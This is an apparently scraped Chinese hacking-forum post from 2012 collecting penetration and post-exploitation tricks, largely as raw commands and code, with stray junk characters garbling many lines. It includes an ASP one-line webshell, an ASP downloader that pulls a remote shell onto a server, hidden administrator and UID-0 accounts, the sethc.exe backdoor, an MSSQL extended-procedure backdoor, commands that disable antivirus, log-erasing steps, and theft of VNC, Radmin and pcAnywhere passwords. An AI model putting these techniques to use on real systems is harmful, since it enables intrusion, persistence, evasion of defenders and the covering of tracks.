中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
# \; {; J4 A0 s9 E" _( u2、用以下VBS
On Error Resume Next
8 Z+ l6 l5 n3 \1 {2 u- KIf (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
4 y& \$ j% f! T        
, Q( W5 @; u# f9 A
! G, i) L1 F  e& U5 iMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "
$ x3 h: p) j5 a* C. a
Usage:Cscript vWeb.vbs",4096,"Lilo"
6 k/ B4 i+ {& F& Z        WScript.Quit
6 F3 a$ \7 |7 h" h& |* \- SEnd If
0 ?- v1 U/ |$ G* X" ^# H$ NSet ObjService=GetObject

("IIS://LocalHost/W3SVC")
; u& u7 ~; ^- N2 e9 {For Each obj3w In objservice
# s5 K/ T2 j# j9 J6 e        If IsNumeric(obj3w.Name)

Then
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         
: W" I' {$ h  x& y1 Z* I. K
7 c) G) U0 @1 {( _9 ~' e) G; e       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
$ S7 i  h# j* @; g+ ?                If Err

$ I# ~+ z: G  j9 o& a% D, t* y<> 0 Then WScript.Quit (1)
- J' _3 o3 J, z& l2 N/ x                WScript.Echo Chr(10) & "[" &
! c" k' ^3 }2 X) R2 `' }2 ?
7 x( a% a3 x# ]4 }5 q8 {OService.ServerComment & "]"
                For Each Binds In OService.ServerBindings
$ |' [" X0 Q' E- X" O1 a  D     

                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
                        

WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
                Next
      

2 g3 v( d! D! V+ F2 `6 Q         WScript.Echo "ath            : " & VDirObj.Path
! O" o: E5 `7 p7 T) n        End If
Next
6 [; x1 [9 a$ {# a复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
- S% {' ?9 y  `1 ^( l+ {4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
- \& v3 \0 _- b) p$ v+ q; ?% t: v+ s) h—————————————————————
WordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
1 X8 I& E2 ?' a  W+ y6 Ourl/wp-content/plugins/akismet/hello.php
——————————————————————
- A8 X/ }. B% p7 z$ U; F' W# AphpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.php
; J/ {. `5 _' g# }! HphpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
) l2 [* c0 R7 A" r网站可能目录(注：一般是虚拟主机类）
7 N. G; g+ n% j1 m4 Z! Q( H8 E" ndata/htdocs.网站/网站/
2 V( b% W& }9 g1 z————————————————————
CMD下操作VPN相关
netsh ras set user administrator permit #允许administrator拨入该VPN
netsh ras set user administrator deny #禁止administrator拨入该VPN
: y$ L+ O/ H* u. M7 _netsh ras show user #查看哪些用户可以拨入VPN
2 @6 w9 R* S$ X6 M6 unetsh ras ip show config #查看VPN分配IP的方式
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
% `8 N0 ~- P# U; H: }" j————————————————————
命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
8 q( B+ Q1 \. M+ e6 g
另类的加用户方法
7 j: y* g" q5 B3 P5 F1 a( R  ~在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
js:
- I9 _6 [* Z- }8 x: ^# h6 V& Z3 F! Kvar o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
% i7 b8 t) @5 e, D+ vz.changePassword("123456","")
6 G6 u2 T% e0 j- fz.setting("AccountType")=3;
' y3 ]+ z- O+ Q. a; W5 S  X
6 D! O# G1 k3 v8 [vbs:
Set   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
+ H, A* c7 {3 c% Q" }, G% k# |z.changePassword "123456",""
z.setting("AccountType")=3
——————————————————
. M  b# S7 m2 [/ v4 x. R( ~cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
: e% c+ B& ?- a& E2 C0 D
命令如下
+ ]& e/ s! y* P: u' Rcacls c: /e /t /g everyone:F           #c盘everyone权限
' X/ T; B3 s) D% {9 Ucacls "目录" /d everyone               #everyone不可读，包括admin
————————以下配合PR更好————
3389相关
  W6 i4 J, P* la、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
b、内网环境（LCX）
7 l% f2 M4 J+ I- ?. gc、终端服务器超出了最大允许连接
" F" R2 h! Y4 {6 dXP 运行mstsc /admin
2003 运行mstsc /console   
# s$ F( _5 [2 C8 M8 I) P" I
+ B' }/ W( o% q! ]- J* |杀软关闭（把杀软所在的文件的所有权限去掉）
4 s6 }% Y; h9 C处理变态诺顿企业版：
net stop "Symantec AntiVirus" /y
: y% _( |! G5 u( fnet stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
+ G# X8 R( f3 u0 Enet stop "Symantec Settings Manager" /y

卖咖啡：net stop "McAfee McShield"
————————————————————
4 J: A# W- ?; T+ y
" u$ g6 G" f$ a2 ^5 }1 r+ Y5次SHIFT：
7 o/ a( P- k: \* mcopy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
6 C0 |2 H% J2 u4 g# J——————————————————————
+ z- s# U* [- [/ ~% X隐藏账号添加：
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
& u! x, f4 S  o! z/ I1 L4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
MSSQL扩展后门：
USE master;
/ B2 f" @: O) h3 _EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
———————————————————————
& W- ?! v2 S4 ]3 o" g1 u- J日志处理
, ~4 q: E3 k/ H9 ^0 O- MC:\WINNT\system32\LogFiles\MSFTPSVC1>下有
: ]$ c) G" l4 `" k" f- qex011120.log / ex011121.log / ex011124.log三个文件，
1 t# u+ P" v4 I直接删除 ex0111124.log
不成功，“原文件...正在使用”
( d/ t" L. a$ v: z6 q# C3 n( s当然可以直接删除ex011120.log / ex011121.log
" o  S6 W, Y( \用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
当停止msftpsvc服务后可直接删除ex011124.log

$ ]: _/ a, L: h+ w! F& [: kMSSQL查询分析器连接记录清除：
% J5 P  K& c+ ~% gMSSQL 2000位于注册表如下：
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
3 K0 q6 m* W" q1 M5 Z* d/ n  @: L
Server\90\Tools\Shell\mru.dat
—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）

: z1 ]8 h3 {' Y6 H9 M# M* ]<%
6 Y/ a/ o; T; i" ]! z% {4 w5 |# pSub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
& `' X+ u$ q' j8 s: CDim Ads, Retrieval, GetRemoteData
On Error Resume Next
: E* w' b& r/ z* w2 TSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
/ G8 q. y4 U5 |# b3 \With Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
GetRemoteData = .ResponseBody
' o+ \; s8 v0 B8 N# y$ ^End With
) @, |$ ]4 M2 Y7 rSet Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
6 x) W1 L0 R  G4 E8 H; e; QWith Ads
* y- q0 V9 [* |.Type = 1
.Open
$ {+ c6 ^4 k- d. B# F  [.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
" F8 W3 {8 H% P, a% ^: ?' s.Cancel()
1 X" F2 e! T, ~* I.Close()
, w( |1 z9 ]# i* l) u: S2 uEnd With
Set Ads=nothing
End Sub
3 P+ y, }, x7 U
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
%>
- H. m. G" T. T  U
6 e5 p; y3 k* L% DVNC提权方法:
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
5 k" W8 X9 r! I  N# i- c, \5 p, O2 \注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
. s: C" Z5 [% p# ?- T8 K, tregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
+ }8 N3 G/ j/ F* \9 iRadmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
* Y1 [$ R9 P  j, W5 dHKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
Users\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
( O! n6 _1 ]6 W. s% y6 Y0 z7 @搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
. o3 c: u. H' D' S——————————————————----------
WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
没有删cmd组建的直接加用户。
. [! O6 q/ |  @  S9 w/ j) ]7i24的web目录也是可写，权限为administrator。
& r' o; \- U) [
$ {* Q8 K$ e1 A# a1433 SA点构建注入点。
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
, h) V$ l/ @( Z+ n  }) k# KstrSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
9 {% E# S7 m5 ~* ?8 ]6 C0 XSet conn = Server.createObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

+ K: G, r0 a* H) [. n+ D/ O4 ~";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &
6 I( x2 b( e+ y% u8 U5 G) P4 l3 |
6 }" l+ n% U: c% M8 }) hstrSQLDBName & ";"
/ M: [1 G- A3 g& V, P9 vconn.open strCon
& K- I: C' |* [( p) L, _' Hdim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
( Y. C8 @0 f+ |3 x% X, _  eid = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
+ _; \, U' C  r+ ?+ Ars.close
%>
# r) p( g4 q" ]( _复制代码
2 |7 [0 d+ W8 F; K- \( G' v1 h: G! k  }******liunx 相关******
! ^1 d) J  P; T7 i2 j! s* N. r& J一.ldap渗透技巧
2 {: m+ `2 Q# w/ h( r! E6 E1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
) Q0 ~; b/ l/ I& r/ a2 H( e" P  |
4 L) C4 B6 {: x. V, j2.less /etc/ldap.conf
: g! f% m! d2 |1 E- E/ Rbase ou=People,dc=unix-center,dc=net
6 A! O5 q$ L, z* h# W: O找到ou,dc,dc设置

3 I. N- |: i0 F3 g( y: O, z3.查找管理员信息
1 [* i2 M) E. O+ d匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
! n4 j* [2 e3 t# q% M
. s! G# O6 h6 t3 K; O3 @$ C7 J( O"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
5 ^' n: N/ H6 d* M
  o$ z; `2 o" s; C6 n"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

+ F$ d8 p# _8 q7 A" h2 E
4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
+ {8 d8 H6 S4 G! O/ Q% z
5 c7 f& {( @8 v: k+ |2 U2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
9 H3 U# @, M2 b, w找到ou,dc,dc设置

0 l1 T: E, h, a$ _/ J3.查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
+ m! {4 u2 F3 e, U" Z; gldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
* g  l5 F# p4 E& F
1 d. |# r5 F! R# `$ x$ W"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
' r8 @( [' _, G
+ N/ p! n2 H; [5 I$ j& F
2 A% H7 y8 B4 I7 C  e3 O5 {& ?4.查找10条用户记录
3 H. c* e$ X+ u0 M/ k: Lldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

+ M. c- e9 e% d. U! ^2 G渗透实战:
* l+ p8 @3 |- Y+ H+ h0 U' S1.返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
, T* n, u1 K; ~2 |. V6 s2 Hversion: 1
/ }" _% k. d  k$ ~dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
5 z7 i3 y/ Q6 M1 w! Z* n" T) mobjectClass: inetOrgPerson
+ @" o9 C# y% o5 E9 `objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager
" m9 r0 O$ R) `# F- b
8 l" b4 N3 R' r+ S( b, e4 i% Rdn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
* n: [2 E' }" e) ^objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
2 z) L4 b' g# I% \+ PobjectClass: inetOrgPerson
objectClass: organizationalPerson
' S* P9 @* `6 d8 r* V: FobjectClass: person
5 \) n( Z3 w' lobjectClass: top
5 l1 C' S( Z" [3 E& i8 U0 jsn: admin
cn: admin
1 n9 N/ @( M' `
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
$ @+ L" @. l9 m" [uid: dcp_anonymous
9 k) o% f% ^( jobjectClass: top
objectClass: person
) t  d, \7 {- A' i; H( I0 n0 P1 {objectClass: organizationalPerson
objectClass: inetOrgPerson
" E5 O* b5 ~: A& N+ ~$ h1 psn: dcp_anonymous
* A# Q. D: u3 ^0 V  }* k* p0 u8 Lcn: dcp_anonymous
" g' E8 \% l" B3 S" m) A6 y
1 j( T0 |7 [" G( t2.查看基类
; i7 I) ^5 U' x+ `bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |

more
" z  [% _! R, x5 L1 Vversion: 1
dn: dc=ruc,dc=edu,dc=cn
5 V  U; p, f1 X' @4 \/ z. z7 ndc: ruc
  @8 A  q' T. WobjectClass: domain
' \; V' _, C- ~* m" L( _4 D* Z
3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
% O, Q4 c) R9 H" PobjectClass: top
5 t9 g: K1 Y- ?  f( K2 W% CnamingContexts: dc=ruc,dc=edu,dc=cn
$ {; p+ M! y5 w7 }supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
2 h9 ~% |  K; WsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
- f) C% S1 ]2 l( |7 l6 f( G1 y) t! xsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
, l, Z) ^  y  ]- X2 O& jsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
' u( g3 c: }/ P. F9 ~supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
$ C% A. d# U9 I# J' J, DsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
9 v  S; ~6 w& N9 c. H* ^supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
. ^1 Z/ ~: J% ?5 Y  C% f/ ~supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
! M, _, r9 l$ W6 `# e) isupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
' J# C, {6 n2 x5 {9 N: GsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
/ U+ I0 T' \# X; jsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
$ K! o  V0 ?. h5 S9 HsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
8 t' I7 {8 U9 S9 l8 }; tsupportedControl: 1.2.840.113556.1.4.473
/ z7 ?0 D, `; l4 d# h5 x! `6 D' {supportedControl: 2.16.840.1.113730.3.4.9
9 y" \, s1 p1 k- A4 jsupportedControl: 2.16.840.1.113730.3.4.16
6 I( C9 l+ S4 x. i& CsupportedControl: 2.16.840.1.113730.3.4.15
+ b: u& ^1 X% [  n; qsupportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
+ T( g% M- m1 \% ?. y$ PsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
' x/ e4 k9 V4 W/ |supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
& ?' [( @! n/ U5 v0 dsupportedControl: 2.16.840.1.113730.3.4.12
  C3 k/ E% D  xsupportedControl: 2.16.840.1.113730.3.4.18
/ @, L( l! L- D8 isupportedControl: 2.16.840.1.113730.3.4.13
8 Y, Y. l7 i% M8 |supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
5 g7 x# c- c9 u, T5 m' v- H! unetscapemdsuffix: cn=ldap://dc=webA:389
4 A7 F. L9 B# s# [supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
9 W) B- ]* }9 @8 H$ vsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
: [3 `& U* x/ ^  @supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
9 U& w5 t% T; y( C2 a% Y- ^8 RsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
4 D; m" T+ ~( v# J" osupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
8 O7 C% F( t  {* l$ dsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
/ M, J; X' h6 _0 ]- E8 `) @supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
9 G" h: |: i/ q- ]supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
6 j# w* _' K# W1 C7 v0 ssupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
  ~1 o1 B7 k  D- g' B8 lsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
9 V7 x+ b. D0 \+ F; tsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
" P: ~7 P( D+ _2 o* psupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
  f* G% T# y4 ~6 m& l, |5 QsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
% W. u! ?0 y% S# SsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
4 I. H, }9 A0 Z  M5 v5 A+ EsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
4 Z# S7 t9 Y. I* TsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
3 R4 b( T2 F& a3 H2 h5 ~supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
8 [5 m. {% O/ |1 JsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
8 H& [$ i/ a' `supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
) N# _" r) E2 F7 [/ U" BsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
2 P9 m4 `8 S4 t6 u" e, YsupportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
/ @/ k; @, H: f% s# L9 _" ?$ k/ n9 z- SsupportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
6 f/ D; }' r- GsupportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
/ |! J; o+ y0 m. ~6 C9 @supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
5 ]1 b7 `3 _8 bsupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
2 w1 W7 W; q* K+ R+ i————————————
7 T: B  X, G% z9 z: g2. NFS渗透技巧
showmount -e ip
列举IP
——————
- E; v; _/ d+ D7 x- N3.rsync渗透技巧
1.查看rsync服务器上的列表
& w" [+ D$ h( H7 g4 v" {% G  _rsync 210.51.X.X::
finance
  @( a: L' g! r! y8 nimg_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
# [* H5 y2 @# q& M8 n. l4 Xres_img
res_img_c2
chip
chip_c2
! {$ W+ b$ u- }- }4 gent_icms
games
" m4 ^# f* @  w8 k1 mgamesimg
media
mediaimg
8 F! }& s- q9 u- x  Gfashion
res-fashion
res-fo
taobao-home
( |6 B( F9 W3 K6 d* c0 Q  Wres-taobao-home
9 D% f8 T0 I& _' M# Y# Xhouse
$ D7 R1 c; {; Z7 K8 S2 gres-house
res-home
res-edu
" P. W9 Z6 Q/ M; Y# c, L- [res-ent
( @! F# [* f# S/ P  hres-labs
res-news
res-phtv
res-media
home
8 A. [1 Y' g2 J2 o9 fedu
news
res-book
% y7 \6 Y2 G) E0 J9 P8 M7 c
看相应的下级目录(注意一定要在目录后面添加上/)


+ H1 y: V8 C. q' m$ I3 {7 K; brsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
. ~4 ^9 W* J/ v8 \rsync 210.51.X.X::edu/
2 B2 l; F0 j. m! p3 D3 b: w
, K' D( D' n, A* O5 g4 d. ]# Y2.下载rsync服务器上的配置文件
5 Z4 f' N  a1 \$ v8 `! C$ h" Vrsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)
, _' t+ Q1 E1 B  R3 l, J$ }. y: trsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
, U* T9 `% t8 f* n1 khttp://app.finance.xxx.com/warn/nothack.txt
' h$ G* l) d3 o- s) T
- e; _" `+ C2 R+ L4 c4 X& o四.squid渗透技巧
5 o  [" {; }9 x) f+ V+ w6 Onc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
0 W( L) G1 |6 l/ ~5 Q/ |GET HTTP://WWW.sina.com:22 / HTTP/1.0
五.SSH端口转发
$ U7 y' b# X3 \/ V# g6 B/ q# bssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
1 B8 _  z0 R! X7 c
六.joomla渗透小技巧
' t$ f1 U; p0 U" Q4 S确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
) \% L+ c8 v# ?7 ^$ g
15&catid=32:languages&Itemid=47

6 J2 S7 V4 x5 w  H! A( `重新设置密码
, B, ~' c/ o4 \' iindex.php?option=com_user&view=reset&layout=confirm

七: Linux添加UID为0的root用户
useradd -o -u 0 nothack

3 a. U9 p$ W- }, T八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
' {# Z: q; E7 l( [3 a4 i5 X! T; ~- U! U* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
  Q/ F; f0 R+ ]* uid=1001(argp) gid=1001(argp) groups=1001(argp)
2 [$ o) C, f  ^7 ~& z4 @6 [* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
: C0 \1 A( H* z5 Y1 U4 i* [argp@julius ~]$ ./nfs_mount_ex
/ t5 R3 D2 N2 w& R* f* V( D9 u*
7 `. i4 e& p# Icalling nmount()

" o5 d  j1 A: e（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
——————————————
; v. k2 B) o- u: y感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
————————————————————————————
